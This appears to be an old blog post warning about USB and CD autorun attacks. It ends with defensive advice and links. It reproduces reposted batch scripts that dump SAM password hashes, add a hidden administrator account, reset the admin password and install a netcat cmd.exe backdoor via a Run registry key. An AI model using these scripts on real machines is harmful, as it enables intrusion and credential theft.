For the past week there has been a nice discussion on Security focus on USB attacks . Basically what the hacker does is insert a USB keyring device into a computer. The USB device is loaded with a autorun.inf which points to several batch files or scripts that can
-Add new Users
-Change Admin Rights
-Delete Passwords
-Change Passwords
-Use netcat to leave a backdoor
-use pwdump to grap the sam file
-use basic windows commands to grap system information
-download trojens from a server
The possibilities are quite endless. One person (sorry I forgot who it was) actually posted his scripts that he claims work fine and have worked fine on more than one occasion:
Another person pointed out another crule idea. Leaving a CD on the ground with something like "Forth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer and an autorun sequence could have their computer for lunch.*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>
*********<BOF b.bat>
@explorer .
@echo off
:isplaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me )
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
@AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>
Gadi Evron gives some ideas to stop these kind of attacks (one in particular I really like )
Basically, just a heads up that this can and does happen very easily so watch out!Disabling USB all-together, virtually, by domain policy or removing the
USB devices themselves, maybe even just filling the plugs with silicon
or glue physically are some more drastic options which some
organizations *might* take, but I don't see it as a very viable option
for most.
It all depends on your risk analysis. Cost vs. benefit, as always with
security.
There exist several tools to monitor a domain for when and if a USB
device is connected to any remote machine, and of what kind. A simple
web search should help you find some examples.
::links::
Part of the Message:
http://archives.neohapsis.com/archiv...4-05/0139.html
How to make an Auto Run CD:
http://msdn.microsoft.com/library/de...play_intro.asp
USB Storage FAQ:
http://www.microsoft.com/whdc/device...ge/usbfaq.mspx
Solutions:
DeviceLock - http://www.devicelock.com/
LANDesk System Manager 8 - http://www.landesk.com/
OptimAccess WorkSpy -
SecureNT - http://www.securewave.com/
http://www.sodatsw.cz/english /index.htm (description only in czech language)
http://www.annoyances.org/exec/forum/winxp/1079209374